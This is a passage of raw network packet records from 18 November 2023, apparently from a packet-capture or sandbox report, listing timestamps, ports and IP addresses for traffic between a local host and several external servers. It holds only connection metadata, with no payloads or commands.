Nov 18, 2023 10:02:31.427598953 CET	49729	50500	192.168.2.4	194.49.94.152
Nov 18, 2023 10:02:31.499288082 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.499305964 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.499381065 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.499444008 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.499456882 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.499469995 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.499484062 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.499495983 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.499507904 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.499510050 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.499520063 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.499528885 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.499538898 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.499550104 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.499576092 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.499588966 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.499602079 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.499614954 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.499628067 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.499633074 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.499640942 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.499654055 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.499669075 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.499676943 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.499685049 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.499697924 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.499712944 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.499715090 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.499715090 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.499726057 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.499739885 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.499742985 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.499753952 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.499766111 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.499773979 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.499779940 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.499793053 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.499805927 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.499805927 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.499819040 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.499825954 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.499833107 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.499845982 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.499854088 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.499860048 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.499875069 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.499876022 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.499893904 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.499907017 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.499907017 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.499919891 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.499933958 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.499938965 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.499946117 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.499958038 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.499967098 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.499970913 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.499983072 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.499994993 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.499996901 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.500008106 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.500014067 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.500022888 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.500036955 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.500041962 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.500049114 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.500061035 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.500072956 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.500085115 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.500086069 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.500098944 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.500104904 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.500111103 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.500121117 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.500128031 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.500139952 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.500158072 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.500165939 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.500169992 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.500183105 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.500183105 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.500195980 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.500204086 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.500209093 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.500221014 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.500227928 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.500247002 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.500253916 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.500260115 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.500272989 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.500284910 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.500297070 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.500297070 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.500308990 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.500315905 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.500324965 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.500339031 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.500351906 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.500365019 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.500365973 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.500366926 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.500377893 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.500391006 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.500392914 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.500402927 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.500416040 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.500427961 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.500430107 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.500441074 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.500448942 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.500453949 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.500466108 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.500468969 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.500482082 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.500494003 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.500500917 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.500505924 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.500523090 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.500556946 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.502055883 CET	80	49739	149.154.167.99	192.168.2.4
Nov 18, 2023 10:02:31.502151966 CET	49739	80	192.168.2.4	149.154.167.99
Nov 18, 2023 10:02:31.502278090 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.605506897 CET	49742	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:31.605544090 CET	443	49742	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:31.605604887 CET	49742	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:31.606242895 CET	49742	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:31.606260061 CET	443	49742	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:31.724987030 CET	50500	49729	194.49.94.152	192.168.2.4
Nov 18, 2023 10:02:31.726906061 CET	50500	49729	194.49.94.152	192.168.2.4
Nov 18, 2023 10:02:31.726980925 CET	49729	50500	192.168.2.4	194.49.94.152
Nov 18, 2023 10:02:31.799798965 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.799825907 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.799851894 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.799865961 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.799880028 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.799889088 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.799933910 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.799936056 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.799949884 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.799962044 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.799993992 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.800023079 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.800782919 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.800981045 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.800996065 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.801007986 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.801021099 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.801031113 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.801033020 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.801047087 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.801052094 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.801059961 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.801073074 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.801085949 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.801095009 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.801099062 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.801110983 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.801112890 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.801125050 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.801136971 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.801136971 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.801152945 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.801156044 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.801171064 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.801184893 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.801187038 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.801197052 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.801222086 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.801238060 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.801253080 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.801268101 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.801280975 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.801292896 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.801307917 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.801320076 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.801325083 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.801332951 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.801343918 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.801346064 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.801359892 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.801362038 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.801373005 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.801386118 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.801402092 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.801419973 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.801420927 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.801435947 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.801448107 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.801460981 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.801467896 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.801474094 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.801487923 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.801492929 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.801529884 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.801532984 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.801553011 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.801567078 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.801578999 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.801579952 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.801592112 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.801604986 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.801619053 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.801623106 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.801631927 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.801641941 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.801672935 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.801769018 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.801786900 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.801799059 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.801811934 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.801814079 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.801825047 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.801839113 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.801851988 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.801853895 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.801865101 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.801877022 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.801877975 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.801891088 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.801904917 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.801907063 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.801918030 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.801925898 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.801939011 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.801944017 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.801951885 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.801964998 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.801978111 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.801991940 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.801992893 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.802004099 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.802015066 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.802031040 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.802089930 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.802103043 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.802114964 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.802129030 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.802134037 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.802140951 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.802154064 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.802160025 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.802166939 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.802181005 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.802192926 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.802198887 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.802206039 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.802217007 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.802218914 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.802232981 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.802234888 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.802247047 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.802259922 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.802268982 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.802273035 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.802285910 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.802287102 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.802298069 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.802310944 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.802320957 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.802324057 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.802335978 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.802349091 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.802361965 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.802375078 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.802375078 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.802376032 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.802388906 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.802397966 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.802402020 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.802413940 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.802418947 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.802426100 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.802438974 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.802442074 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.802450895 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.802464008 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.802474022 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.802476883 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.802489996 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.802489996 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.802503109 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.802515030 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.802526951 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.802537918 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.802539110 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.802552938 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.802556992 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.802565098 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.802576065 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.802577972 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.802589893 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.802597046 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.802603006 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.802617073 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.802629948 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.802630901 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.802643061 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.802649975 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.802654982 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.802668095 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.802670956 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.802680016 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.802691936 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.802700996 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.802704096 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.802716017 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.802721024 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.802728891 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.802742958 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.802751064 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.802755117 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.802768946 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.802781105 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.802793980 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.802773952 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.802807093 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.802810907 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.802819014 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.802828074 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.802831888 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.802845001 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.802858114 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.802865982 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.802870035 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.802881956 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.802885056 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.802894115 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.802902937 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.802906990 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.802922010 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.802934885 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.802934885 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.802948952 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.802961111 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.802967072 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.802972078 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.802983999 CET	49741	80	192.168.2.4	194.49.94.145
Nov 18, 2023 10:02:31.802985907 CET	80	49741	194.49.94.145	192.168.2.4
Nov 18, 2023 10:02:31.802999020 CET	80	49741	194.49.94.145	192.168.2.4
